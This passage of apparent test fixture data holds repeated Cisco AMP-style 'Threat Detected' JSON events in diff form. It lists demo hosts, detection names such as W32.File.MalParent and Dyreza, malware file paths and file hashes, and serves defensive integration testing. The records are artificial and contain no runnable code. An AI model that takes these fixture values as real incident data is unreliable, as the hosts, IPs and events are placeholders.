Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
